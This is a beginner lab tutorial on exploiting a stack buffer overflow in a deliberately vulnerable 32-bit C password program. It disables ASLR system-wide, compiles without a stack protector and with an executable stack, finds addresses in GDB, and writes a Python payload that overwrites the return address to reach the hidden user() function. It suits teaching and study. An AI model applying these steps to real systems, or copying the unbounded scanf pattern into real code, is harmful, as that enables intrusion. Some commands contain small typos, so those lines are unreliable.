Buffer Overflow Exploit for Linux

Getting things ready for linux terminal with GCC compiler:

Start by updating the packages list:

sudo apt update

Install the build-essential package by typing:

sudo apt install build-essential

For 64 bit machine install the 32-bit libraries with the following command:

sudo apt-get install gcc-multilib

Install GNU Debugger(GDB):

sudo apt install gdb

Disabling memory randomization, enabling core dumps:

Current state of memory randomization:

cat /proc/sys/kernel/randomize_va_space

if the value is 2. it means memory randomization is true

Turn off memory randomization command:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Verify echo "0" from this command:

cat /proc/sys/kernel/randomize_va_space>

After completing buffer overflow attack, turn it back on with the following command:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

To check "ulimit":

ulimit -c

Command to set ulimit--> unlimited:

ulimit -c unlimited

Verify echo "unlimited":

ulimit -c

A vulnerable C program

*This code will be used for this exploit:

• vulnerable.c

#include <stdio.h>
#include <string.h>

void user(){
	printf("Excellent Snake!\n");
	printf("You have infiltrated the facility!!!\n");
}

void login(){
	char password[16];
	printf("Enter your password\n");
	scanf("%s", password);

	if(strcmp(password, "FoxHound")){
		printf("Mission Failed!\n");
	}
	else{
		user();
	}
}

int main()
{
	login();

	return 0;
}

Compiling the C vulnerable program:

Usually we run program by:

gcc -o vulnerable vulnerable.c

Instead, we use following command for this exploit:

gcc -o vulnerable -fno-stack-protector -m32 -z execstack vulnerable.c

Here,

	-fno-stack-protector	-->	Removes the canary value at the end of the buffer

	-m32	--> Sets the program to compile into a 32 bit program
	-z execstack	--> Makes the stack executable

Using GNU Debugger (GDB) and Exploit Buffer

gdb ./vulnerable

Assembly language instructions:

• Firstly disassemble main to know the function state of main in memory.

  (gdb) disassemble main

• Then disassemble login to know the function state of login in memory.

  (gdb) disassemble login

• Then disassemble user to know the function state of login in memory.

  disassemble user

Execute the binary:

run

Enter any text for password:

AAAAAAAA

• This will print incorrect password message. It works normally because it does not exceed the buffer limit.

Creating breakpoint to analyse the program:

disassemble login

break *0x080484ba break *0x080484e6

• This created 2 break point in login function. This will be used to debug the program

• To see information about registers i.e., $esp, $eip memory addresses, enfter following command:

info registers

Run the program again:

run

Enter 8 times A (AAAAAAAA):

AAAAAAAA

Now examine 20 memory address from stack pointer:

x/20x $esp

Continue by entering 'c'. you will see incorrect password:

c

• This exits normally without any fault.

Enter more than 16 times 'A' you will see segmentation fault:

AAAAAAAAAAAAAAAAAAAAA

Go on with user() function start address to next instruction pointer (EIP):

disassemble login

• then store address of user() function

Append '0x0804848b' with 28 times A. reversely --> '\x8b\x84\x04\08'

To get out of gdb, enter:

(gdb) q or [ctrl+shift+z]

Save to text:

python -c "print('A'*28 + '\x8b\x84\x04\x08')" > input.txt

Run program by 'fg' enter:

run < input.txt c c

• You will see "Mission Failed!" but gain access to the user function.

Thats all unless the 64-bit machine has some issues with GDB.